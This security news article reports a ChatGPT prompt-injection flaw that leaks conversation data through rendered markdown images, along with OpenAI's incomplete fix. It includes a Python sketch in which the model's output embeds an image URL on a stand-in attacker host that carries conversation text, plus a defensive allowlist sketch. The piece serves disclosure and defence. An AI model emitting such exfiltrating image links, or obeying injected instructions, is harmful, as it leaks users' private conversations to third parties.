OpenAI has mitigated a data exfiltration bug in ChatGPT that could leak conversation details to an external URL.

According to the researcher who discovered the flaw, the mitigation isn't perfect, so attackers can still exploit it under certain conditions.

Also, the safety checks have yet to be implemented in the ChatGPT iOS app, so the risk on that platform remains unaddressed.

Data leak problem

Security researcher Johann Rehberger discovered a technique to exfiltrate data from ChatGPT and reported it to OpenAI in April 2023. In November 2023, he shared additional information on creating malicious GPTs that leverage the flaw to phish users.

"This GPT and underlying instructions were promptly reported to OpenAI on November, 13th 2023," the researcher wrote in his disclosure.

"However, the ticket was closed on November 15th as 'Not Applicable'. Two follow up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness."

GPTs are custom AI models marketed as "AI apps" that specialize in various roles, such as acting as customer support agents, assisting with writing and translation, performing data analysis, crafting cooking recipes based on available ingredients, gathering data for research, and even playing games.

Given the lack of response from OpenAI, the researcher publicly disclosed his findings on December 12, 2023, demonstrating a custom tic-tac-toe GPT named 'The Thief!' that can exfiltrate conversation data to an external URL operated by the researcher.



The data theft relies on prompt injection and markdown image rendering, so the attack requires the victim to submit a malicious prompt that the attacker either supplied directly or posted somewhere for victims to find and use.

Alternatively, an attacker can use a malicious GPT, as Rehberger demonstrated. Users of that GPT would not realize that their conversation details, along with metadata (timestamps, user ID, session ID) and technical data (IP address, user agent strings), are being exfiltrated to third parties.
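To illustrate why rendering an image is enough to leak data: when a chat client displays a markdown image, the browser or app issues a GET request to the image URL, and anything the injected instructions placed in that URL's query string travels with it, along with the requester's IP address and user agent. The minimal Python sketch below assumes a hypothetical model response and a hypothetical attacker host (`attacker.example`), and simply extracts the host and query parameters each embedded image would send. It is not Rehberger's actual payload.

```python
import re
from urllib.parse import parse_qs, quote, urlparse

# Matches markdown images of the form ![alt](url) and captures the URL.
IMAGE_MD = re.compile(r"!\[[^\]]*\]\((\S+?)\)")


def image_requests(markdown: str) -> list[tuple[str, dict[str, list[str]]]]:
    """Return (host, query parameters) for every image a client would fetch."""
    requests = []
    for url in IMAGE_MD.findall(markdown):
        parsed = urlparse(url)
        requests.append((parsed.netloc, parse_qs(parsed.query)))
    return requests


# Hypothetical model output after a prompt injection: the "image" URL
# smuggles a summary of the conversation in its query string.
leaked = "user asked about their medical results"
response = f"Your move! ![board](https://attacker.example/log.png?q={quote(leaked)})"

for host, params in image_requests(response):
    print(host, params)  # attacker.example {'q': ['user asked about their medical results']}
```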

OpenAI's incomplete fix

After Rehberger published the flaw details on his blog, OpenAI responded by implementing client-side checks, performed via a call to a validation API, that prevent images from unsafe URLs from rendering.

"When the server returns an image tag with a hyperlink, there is now a ChatGPT client-side call to a validation API before deciding to display an image," explains Rehberger in a new post that revisits the issue to discuss the fix.

"Since ChatGPT is not open source and the fix is not via a Content-Security-Policy (that is visible and inspectable by users and researchers) the exact validation details are not known."
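Because the validation logic is not public, the following is only a hypothetical sketch of the general idea: decide on the client, before anything is fetched, whether an image URL may be rendered. It swaps OpenAI's remote validation API for a local allowlist check. The function names and the `cdn.example.com` host are illustrative assumptions, not ChatGPT's actual behavior.

```python
import html
from urllib.parse import urlparse

# Hypothetical allowlist; the real criteria ChatGPT uses are not public.
TRUSTED_IMAGE_HOSTS = {"cdn.example.com"}


def is_safe_image_url(url: str) -> bool:
    """Accept only HTTPS URLs whose host is on the allowlist."""
    parsed = urlparse(url)
    # .hostname drops any user:password@ prefix and port, and lowercases the host.
    return parsed.scheme == "https" and parsed.hostname in TRUSTED_IMAGE_HOSTS


def render_image(url: str) -> str:
    """Return HTML for an allowed image, or a placeholder, without fetching anything."""
    if is_safe_image_url(url):
        return f'<img src="{html.escape(url, quote=True)}">'
    return "[image blocked]"


print(render_image("https://cdn.example.com/board.png"))  # <img src="https://cdn.example.com/board.png">
print(render_image("https://attacker.example/log.png?q=secret"))  # [image blocked]
```

A Content-Security-Policy `img-src` directive would enforce a similar restriction in the browser itself and, as Rehberger points out, would be visible to anyone inspecting the page.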

The researcher notes that ChatGPT still renders images from arbitrary domains in some cases, so the attack can still occasionally work, and results were inconsistent even when testing the same domain.

Since specific details on the check that determines if a URL is safe are unknown, there's no way to know the exact cause of these discrepancies.

However, he notes that exploiting the flaw is now noisier, is rate-limited in how much data it can transfer, and works much more slowly.

Rehberger also notes that the client-side validation call has not yet been implemented in the iOS mobile app, so the attack remains completely unmitigated there.

It is also unclear whether the fix was rolled out to the ChatGPT Android app, which has over 10 million downloads on Google Play.
